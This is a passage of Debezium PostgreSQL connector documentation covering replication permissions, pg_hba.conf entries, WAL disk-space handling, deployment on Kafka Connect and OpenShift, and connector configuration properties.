group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT __<replication_group>__ TO __<original_owner>__;\n----\n. Add the {prodname} replication user to the group.\n+\n[source,sql,subs=\"+quotes\"]\n----\nGRANT __<replication_group>__ TO __<replication_user>__;\n----\n. 
Transfer ownership of the table to `<replication_group>`.\n+\n[source,sql,subs=\"+quotes\"]\n----\nALTER TABLE __<table_name>__ OWNER TO __<replication_group>__;\n----\n\nFor {prodname} to specify the capture configuration, the value of {link-prefix}:{link-postgresql-connector}#postgresql-publication-autocreate-mode[`publication.autocreate.mode`] must be set to `filtered`.\n
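\nPutting the procedure together, the following is a minimal sketch that uses hypothetical names: a group role `replication_group`, an existing table owner `app_owner`, a {prodname} user `debezium`, and a captured table `inventory.orders`:\n\n[source,sql]\n----\n-- Shared ownership so that the connector user can add inventory.orders to a publication.\nCREATE ROLE replication_group;\nGRANT replication_group TO app_owner;\nGRANT replication_group TO debezium;\nALTER TABLE inventory.orders OWNER TO replication_group;\n----\n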
\n\/\/ Type: procedure\n\/\/ ModuleID: configuring-postgresql-to-allow-replication-with-the-connector-host\n[[postgresql-host-replication-permissions]]\n=== Configuring PostgreSQL to allow replication with the {prodname} connector host\n\nTo enable {prodname} to replicate PostgreSQL data, you must configure the database to permit replication with the host that runs the PostgreSQL connector.\nTo specify the clients that are permitted to replicate with the database, add entries to the PostgreSQL host-based authentication file, `pg_hba.conf`.\nFor more information about the `pg_hba.conf` file, see link:https:\/\/www.postgresql.org\/docs\/10\/auth-pg-hba-conf.html[the PostgreSQL documentation].\n\n.Procedure\n\n* Add entries to the `pg_hba.conf` file to specify the {prodname} connector hosts that can replicate with the database host.\nFor example,\n+\n.`pg_hba.conf` file example:\n[source]\n----\nlocal replication <youruser> trust \/\/ <1>\nhost replication <youruser> 127.0.0.1\/32 trust \/\/ <2>\nhost replication <youruser> ::1\/128 trust \/\/ <3>\n----\n<1> Instructs the server to allow replication for `<youruser>` locally, that is, on the server machine.\n<2> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV4`.\n<3> Instructs the server to allow `<youruser>` on `localhost` to receive replication changes using `IPV6`.\n\n[NOTE]\n====\nFor more information about network masks, see link:https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-net-types.html[the PostgreSQL documentation].\n====\n\nifdef::community[]\n[[supported-postgresql-topologies]]\n=== Supported PostgreSQL topologies\n\nThe PostgreSQL connector can be used with a standalone PostgreSQL server or with a cluster of PostgreSQL servers.\n\nAs mentioned {link-prefix}:{link-postgresql-connector}#postgresql-limitations[in the beginning], PostgreSQL (for all versions <= 12) supports logical replication slots on only `primary` servers. This means that a replica in a PostgreSQL cluster cannot be configured for logical replication, and consequently that the {prodname} PostgreSQL connector can connect and communicate with only the primary server. Should this server fail, the connector stops. When the cluster is repaired, if the original primary server is once again promoted to `primary`, you can restart the connector. However, if a different PostgreSQL server _with the plug-in and proper configuration_ is promoted to `primary`, you must change the connector configuration to point to the new `primary` server and then you can restart the connector.\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: configuring-postgresql-to-manage-debezium-wal-disk-space-consumption\n\/\/ Title: Configuring PostgreSQL to manage {prodname} WAL disk space consumption\n[[postgresql-wal-disk-space]]\n=== WAL disk space consumption\nIn certain cases, it is possible for PostgreSQL disk space consumed by WAL files to spike or increase beyond usual proportions.\nThere are several possible reasons for this situation:\n\n* The LSN up to which the connector has received data is available in the `confirmed_flush_lsn` column of the server's `pg_replication_slots` view. Data that is older than this LSN is no longer available, and the database is responsible for reclaiming the disk space.\n+\nAlso in the `pg_replication_slots` view, the `restart_lsn` column contains the LSN of the oldest WAL that the connector might require. If the value for `confirmed_flush_lsn` is regularly increasing and the value of `restart_lsn` lags, then the database needs to reclaim the space.\n+\nThe database typically reclaims disk space in batch blocks. This is expected behavior and no action by a user is necessary.\n\n* There are many updates in a database that is being tracked but only a tiny number of updates are related to the table(s) and schema(s) for which the connector is capturing changes. This situation can be easily solved with periodic heartbeat events. Set the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-interval-ms[`heartbeat.interval.ms`] connector configuration property.\n\n* The PostgreSQL instance contains multiple databases and one of them is a high-traffic database. {prodname} captures changes in another database that is low-traffic in comparison to the other database. {prodname} then cannot confirm the LSN, because replication slots work per-database, and {prodname} is not invoked. As WAL is shared by all databases, the amount used tends to grow until an event is emitted by the database for which {prodname} is capturing changes. To overcome this, it is necessary to:\n\n** Enable periodic heartbeat record generation with the `heartbeat.interval.ms` connector configuration property.\n** Regularly emit change events from the database for which {prodname} is capturing changes.\nifdef::community[]\n\n+\nIn the case of the `wal2json` decoder plug-in, it is sufficient to generate empty events. This can be achieved, for example, by truncating an empty temporary table. For other decoder plug-ins, the recommendation is to create a supplementary table for which {prodname} is not capturing changes.\nendif::community[]\n\n+\nA separate process would then periodically update the table by either inserting a new row or repeatedly updating the same row.\nPostgreSQL then invokes {prodname}, which confirms the latest LSN and allows the database to reclaim the WAL space.\nThis task can be automated by means of the {link-prefix}:{link-postgresql-connector}#postgresql-property-heartbeat-action-query[`heartbeat.action.query`] connector configuration property.\n
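\nAs a concrete sketch, assuming a supplementary table named `heartbeat` in the low-traffic database (the table name, its columns, and the 10-second interval are illustrative choices, not {prodname} requirements):\n\n[source,sql]\n----\n-- Table that exists only so the heartbeat query has something to write to.\nCREATE TABLE heartbeat (id SERIAL PRIMARY KEY, ts TIMESTAMPTZ);\n----\n\n[source,properties]\n----\n# Connector configuration, shown as flat properties;\n# use the equivalent JSON keys in a REST registration.\nheartbeat.interval.ms=10000\nheartbeat.action.query=INSERT INTO heartbeat (ts) VALUES (now())\n----\n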
\nifdef::community[]\n[TIP]\n====\nFor users on AWS RDS with PostgreSQL, a situation similar to the high-traffic\/low-traffic scenario can occur in an idle environment.\nAWS RDS performs writes to its own system tables at frequent intervals (every 5 minutes), but those writes are not visible to clients.\nAgain, regularly emitting events solves the problem.\n====\nendif::community[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-postgresql-connectors\n\/\/ Title: Deployment of {prodname} PostgreSQL connectors\n[[postgresql-deployment]]\n== Deployment\n\nifdef::community[]\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} PostgreSQL connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-postgres\/{debezium-version}\/debezium-connector-postgres-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n
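\nFor example, assuming the archive was downloaded to the current directory and `\/kafka\/connect` is the plug-in directory you use (both are illustrative, not requirements):\n\n[source,shell]\n----\n# Unpack the connector archive into the Kafka Connect plug-in directory.\ntar -xzf debezium-connector-postgres-{debezium-version}-plugin.tar.gz -C \/kafka\/connect\n\n# Then point Kafka Connect at that directory, for example in connect-distributed.properties:\n# plugin.path=\/kafka\/connect\n----\n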
\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka, PostgreSQL and Kafka Connect with the PostgreSQL connector already installed and ready to run. You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} PostgreSQL connector, add the connector files to Kafka Connect, create a custom container to run the connector, and add connector configuration to your container. Details are in the following topics:\n\n* xref:deploying-debezium-postgresql-connectors[]\n* xref:descriptions-of-debezium-postgresql-connector-configuration-properties[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: deploying-debezium-postgresql-connectors\n\/\/ Title: Deploying {prodname} PostgreSQL connectors\n[[postgresql-deploying-a-connector]]\n=== Deploying connectors\n\nTo deploy a {prodname} PostgreSQL connector, you need to build a custom Kafka Connect container image that contains the {prodname} connector archive and push this container image to a container registry. You then need to create two custom resources (CRs):\n\n* A `KafkaConnect` CR that configures your Kafka Connector and that specifies the name of the image that you created to run your {prodname} connector. You apply this CR to the OpenShift Kafka instance.\n\n* A `KafkaConnector` CR that configures your {prodname} PostgreSQL connector. You apply this CR to the OpenShift instance where Red Hat AMQ Streams is deployed.\n\n.Prerequisites\n\n* PostgreSQL is running and you performed the steps to {LinkDebeziumUserGuide}#setting-up-postgresql-to-run-a-debezium-connector[set up PostgreSQL to run a {prodname} connector].\n\n* link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] was used to set up and start running Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your {prodname} connector.\n\n.Procedure\n\n. Create the {prodname} PostgreSQL container for Kafka Connect:\n.. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[PostgreSQL connector archive].\n\n.. Extract the {prodname} PostgreSQL connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=\"+macros\"]\n----\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-postgresql\n\u2502 \u251c\u2500\u2500 ...\n----\n\n.. Create a Docker file that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following, replacing `my-plugins` with the name of your plug-ins directory:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-postgresql.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nCOPY .\/_<my-plugins>_\/ \/opt\/kafka\/plugins\/ \/\/ <2>\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Replace `my-plugins` with the name of your plug-ins directory.\n+\nThe command creates a Docker file with the name `debezium-container-for-postgresql.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-postgresql.yaml` Docker file that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-postgresql:latest .\n----\n+\nThe `build` command builds a container image with the name `debezium-container-for-postgresql`.\n\n.. Push your custom image to a container registry such as `quay.io` or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-postgresql:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-postgresql:latest\n----\n\n.. Create a new {prodname} PostgreSQL `KafkaConnect` custom resource (CR).\nFor example, create a `KafkaConnect` CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n  name: my-connect-cluster\n  annotations:\n    strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n  image: debezium-container-for-postgresql \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that `KafkaConnector` resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your {prodname} connector. This property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. Apply your `KafkaConnect` CR to the OpenShift Kafka instance by running the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThis updates your Kafka Connect environment in OpenShift to add a Kafka Connector instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. 
Create a `KafkaConnector` custom resource that configures your {prodname} PostgreSQL connector instance.\n+\nYou configure a {prodname} PostgreSQL connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed.\nFor the complete list of the configuration properties that you can set for the {prodname} PostgreSQL connector, see {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[PostgreSQL connector properties].\n+\nThe following example configures a {prodname} connector that connects to a PostgreSQL server host, `192.168.99.100`, on port `5432`. This host has a database named `sampledb`, a schema named `public`, and `fulfillment` is the server's logical name.\n+\n.`fulfillment-connector.yaml`\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectorApiVersion}\nkind: KafkaConnector\nmetadata:\n  name: fulfillment-connector \/\/ <1>\n  labels:\n    strimzi.io\/cluster: my-connect-cluster\nspec:\n  class: io.debezium.connector.postgresql.PostgresConnector\n  tasksMax: 1 \/\/ <2>\n  config: \/\/ <3>\n    database.hostname: 192.168.99.100 \/\/ <4>\n    database.port: 5432\n    database.user: debezium\n    database.password: dbz\n    database.dbname: sampledb\n    database.server.name: fulfillment \/\/ <5>\n    schema.include.list: public \/\/ <6>\n    plugin.name: pgoutput \/\/ <7>\n----\n<1> The name of the connector.\n<2> Only one task should operate at any one time.\nBecause the PostgreSQL connector reads the PostgreSQL server\u2019s write-ahead log (WAL),\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n<3> The connector\u2019s configuration.\n<4> The name of the database host that is running the PostgreSQL server. In this example, the database host name is `192.168.99.100`.\n<5> A unique server name.\nThe server name is the logical identifier for the PostgreSQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics that receive change event records.\n<6> The connector captures changes in only the `public` schema. It is possible to configure the connector to capture changes in only the tables that you choose. See {link-prefix}:{link-postgresql-connector}#postgresql-property-table-include-list[`table.include.list` connector configuration property].\n<7> The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server. For PostgreSQL 10 and later, the only supported value is `pgoutput`, and you must explicitly set `plugin.name` to `pgoutput`.\n\n. Create your connector instance with Kafka Connect. For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f fulfillment-connector.yaml\n----\n+\nThis registers `fulfillment-connector` and the connector starts to run against the `sampledb` database as defined in the `KafkaConnector` CR.\n\n. 
Verify that the connector was created and has started:\n.. Display the Kafka Connect log output to verify that the connector was created and has started to capture changes in the specified database:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/cluster=my-connect-cluster)\n----\n\n.. Review the log output to verify that {prodname} performs the initial snapshot.\nThe log displays output that is similar to the following messages:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n+\nIf the connector starts correctly without errors, it creates a topic for each table whose changes the connector is capturing.\nFor the example CR, there would be a topic for each table in the `public` schema.\nDownstream applications can subscribe to these topics.\n\n.. Verify that the connector created the topics by running the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc get kafkatopics\n----\n\nendif::product[]\n\nifdef::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-postgresql-connector-configuration-example\n\/\/ Title: {prodname} PostgreSQL connector configuration example\n[[postgresql-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a PostgreSQL connector that connects to a PostgreSQL server on port 5432 at 192.168.99.100, whose logical name is `fulfillment`. Typically, you configure the {prodname} PostgreSQL connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n  \"name\": \"fulfillment-connector\", \/\/ <1>\n  \"config\": {\n    \"connector.class\": \"io.debezium.connector.postgresql.PostgresConnector\", \/\/ <2>\n    \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n    \"database.port\": \"5432\", \/\/ <4>\n    \"database.user\": \"postgres\", \/\/ <5>\n    \"database.password\": \"postgres\", \/\/ <6>\n    \"database.dbname\": \"postgres\", \/\/ <7>\n    \"database.server.name\": \"fulfillment\", \/\/ <8>\n    \"table.include.list\": \"public.inventory\" \/\/ <9>\n  }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this PostgreSQL connector class.\n<3> The address of the PostgreSQL server.\n<4> The port number of the PostgreSQL server.\n<5> The name of the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].\n<6> The password for the PostgreSQL user that has the {link-prefix}:{link-postgresql-connector}#postgresql-permissions[required privileges].\n<7> The name of the PostgreSQL database to connect to.\n<8> The logical name of the PostgreSQL server\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<9> A list of all tables hosted by this server that this connector will monitor. 
This is optional, and there are other properties for listing the schemas and tables to include or exclude from monitoring.\n\nSee the {link-prefix}:{link-postgresql-connector}#postgresql-connector-properties[complete list of PostgreSQL connector properties] that can be specified in these configurations.\n\nThis configuration can be sent via POST to a running Kafka Connect service, which then records the configuration and starts the one connector task that connects to the PostgreSQL database, reads the transaction log, and records events to Kafka topics.\n
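\nFor example, a minimal sketch using `curl`, assuming the configuration above is saved as `fulfillment-connector.json` and a Kafka Connect worker is listening on `localhost:8083`:\n\n[source,shell,options=\"nowrap\"]\n----\ncurl -i -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" http:\/\/localhost:8083\/connectors\/ -d @fulfillment-connector.json\n----\n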
\n[[postgresql-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo run a {prodname} PostgreSQL connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The {link-prefix}:{link-postgresql-connector}#postgresql-server-configuration[PostgreSQL server] is configured to support logical replication.\n\n* The {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] is installed.\n\n* The PostgreSQL connector is installed.\n\n.Procedure\n\n. Create a configuration for the PostgreSQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-postgresql-connector}#postgresql-snapshots[performs a consistent snapshot] of the PostgreSQL server databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-configuration-properties\n\/\/ Title: Description of {prodname} PostgreSQL connector configuration properties\n[[postgresql-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} PostgreSQL connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:postgresql-required-configuration-properties[Required configuration properties]\n* xref:postgresql-advanced-configuration-properties[Advanced configuration properties]\n* xref:postgresql-pass-through-properties[Pass-through configuration properties]\n\n[id=\"postgresql-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[postgresql-property-name]]<<postgresql-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[postgresql-property-connector-class]]<<postgresql-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.postgresql.PostgresConnector` for the PostgreSQL connector.\n\n|[[postgresql-property-tasks-max]]<<postgresql-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The PostgreSQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[postgresql-property-plugin-name]]<<postgresql-property-plugin-name, `+plugin.name+`>>\n|`decoderbufs`\n|The name of the PostgreSQL {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in] installed on the PostgreSQL server.\n\nifdef::community[]\nSupported values are `decoderbufs`, `wal2json`, `+wal2json_rds+`, `+wal2json_streaming+`, `+wal2json_rds_streaming+`, and `pgoutput`.\n\nIf you are using the `wal2json` plug-in and transactions are very large, the JSON batch event that contains all transaction changes might not fit into the hard-coded memory buffer, which has a size of 1 GB. In such cases, switch to a streaming plug-in by setting the `plugin.name` property to `wal2json_streaming` or `wal2json_rds_streaming`. With a streaming plug-in, PostgreSQL sends the connector a separate message for each change in a transaction.\n\nendif::community[]\nifdef::product[]\nThe only supported value is `pgoutput`. You must explicitly set `plugin.name` to `pgoutput`.\nendif::product[]\n\n|[[postgresql-property-slot-name]]<<postgresql-property-slot-name, `+slot.name+`>>\n|`debezium`\n|The name of the PostgreSQL logical decoding slot that was created for streaming changes from a particular plug-in for a particular database\/schema. The server uses this slot to stream events to the {prodname} connector that you are configuring.\n\nSlot names must conform to link:https:\/\/www.postgresql.org\/docs\/current\/static\/warm-standby.html#STREAMING-REPLICATION-SLOTS-MANIPULATION[PostgreSQL replication slot naming rules], which state: _\"Each replication slot has a name, which can contain lower-case letters, numbers, and the underscore character.\"_\n\n|[[postgresql-property-slot-drop-on-stop]]<<postgresql-property-slot-drop-on-stop, `+slot.drop.on.stop+`>>\n|`false`\n|Whether or not to delete the logical replication slot when the connector stops in a graceful, expected way. The default behavior is that the replication slot remains configured for the connector when the connector stops. When the connector restarts, having the same replication slot enables the connector to start processing where it left off.\n\nSet to `true` in only testing or development environments. Dropping the slot allows the database to discard WAL segments. 
When the connector restarts, it performs a new snapshot or can continue from a persistent offset in the Kafka Connect offsets topic.\n\n|[[postgresql-property-publication-name]]<<postgresql-property-publication-name, `+publication.name+`>>\n|`dbz_publication`\n|The name of the PostgreSQL publication created for streaming changes when using `pgoutput`.\n\nThis publication is created at start-up if it does not already exist, and it includes _all tables_.\n{prodname} then applies its own include\/exclude list filtering, if configured, to limit the publication to change events for the specific tables of interest.\nThe connector user must have superuser permissions to create this publication,\nso it is usually preferable to create the publication before starting the connector for the first time.\n\nIf the publication already exists, either for all tables or configured with a subset of tables, {prodname} uses the publication as it is defined.\n\n|[[postgresql-property-database-hostname]]<<postgresql-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the PostgreSQL database server.\n\n|[[postgresql-property-database-port]]<<postgresql-property-database-port, `+database.port+`>>\n|`5432`\n|Integer port number of the PostgreSQL database server.\n\n|[[postgresql-property-database-user]]<<postgresql-property-database-user, `+database.user+`>>\n|\n|Name of the PostgreSQL database user for connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-password]]<<postgresql-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the PostgreSQL database server.\n\n|[[postgresql-property-database-dbname]]<<postgresql-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the PostgreSQL database from which to stream the changes.\n\n|[[postgresql-property-database-server-name]]<<postgresql-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular PostgreSQL database server or cluster in which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[postgresql-property-schema-include-list]]<<postgresql-property-schema-include-list, `+schema.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes. Any schema name not included in `schema.include.list` is excluded from having its changes captured. By default, all non-system schemas have their changes captured. Do not also set the `schema.exclude.list` property.\n\n|[[postgresql-property-schema-exclude-list]]<<postgresql-property-schema-exclude-list, `+schema.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes. Any schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. Do not also set the `schema.include.list` property.\n\n|[[postgresql-property-table-include-list]]<<postgresql-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. 
Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[postgresql-property-table-exclude-list]]<<postgresql-property-table-exclude-list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has its changes captured. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[postgresql-property-column-include-list]]<<postgresql-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[postgresql-property-column-exclude-list]]<<postgresql-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[postgresql-property-time-precision-mode]]<<postgresql-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n|Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`adaptive_time_microseconds` captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. An exception is `TIME` type fields, which are always captured as microseconds. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-postgresql-connector}#postgresql-temporal-values[temporal values].\n\n|[[postgresql-property-decimal-handling-mode]]<<postgresql-property-decimal-handling-mode, `+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` represents values by using `java.math.BigDecimal` to represent values in binary form in change events. +\n +\n`double` represents values by using `double` values, which might result in a loss of precision but which is easier to use. +\n +\n`string` encodes values as formatted strings, which are easy to consume but semantic information about the real type is lost. 
See {link-prefix}:{link-postgresql-connector}#postgresql-decimal-types[Decimal types].\n\n|[[postgresql-property-hstore-handling-mode]]<<postgresql-property-hstore-handling-mode, `+hstore.handling.mode+`>>\n|`map`\n|Specifies how the connector should handle values for `hstore` columns: +\n +\n`map` represents values by using `MAP`. +\n +\n`json` represents values by using JSON strings. This setting encodes values as formatted strings such as `{\"key\" : \"val\"}`. See {link-prefix}:{link-postgresql-connector}#postgresql-hstore-type[PostgreSQL `HSTORE` type].\n\n|[[postgresql-property-interval-handling-mode]]<<postgresql-property-interval-handling-mode, `+interval.handling.mode+`>>\n|`numeric`\n|Specifies how the connector should handle values for `interval` columns: +\n +\n`numeric` represents intervals by using the approximate number of microseconds. +\n +\n`string` represents intervals exactly by using the string pattern representation `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`. For example: `P1Y2M3DT4H5M6.78S`. See {link-prefix}:{link-postgresql-connector}#postgresql-basic-types[PostgreSQL basic types].\n\n|[[postgresql-property-database-sslmode]]<<postgresql-property-database-sslmode, `+database.sslmode+`>>\n|`disable`\n|Whether to use an encrypted connection to the PostgreSQL server. Options include: +\n +\n`disable` uses an unencrypted connection. +\n +\n`require` uses a secure (encrypted) connection, and fails if one cannot be established. +\n +\n`verify-ca` behaves like `require` but also verifies the server TLS certificate against the configured Certificate Authority (CA) certificates, or fails if no valid matching CA certificates are found. +\n +\n`verify-full` behaves like `verify-ca` but also verifies that the server certificate matches the host to which the connector is trying to connect. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslcert]]<<postgresql-property-database-sslcert, `+database.sslcert+`>>\n|\n|The path to the file that contains the SSL certificate for the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslkey]]<<postgresql-property-database-sslkey, `+database.sslkey+`>>\n|\n|The path to the file that contains the SSL private key of the client. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslpassword]]<<postgresql-property-database-sslpassword, `+database.sslpassword+`>>\n|\n|The password to access the client private key from the file specified by `database.sslkey`. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-sslrootcert]]<<postgresql-property-database-sslrootcert, `+database.sslrootcert+`>>\n|\n|The path to the file that contains the root certificate(s) against which the server is validated. See link:https:\/\/www.postgresql.org\/docs\/current\/static\/libpq-connect.html[the PostgreSQL documentation] for more information.\n\n|[[postgresql-property-database-tcpkeepalive]]<<postgresql-property-database-tcpkeepalive, `+database.tcpKeepAlive+`>>\n|`true`\n|Enable TCP keep-alive probe to verify that the database connection is still alive. 
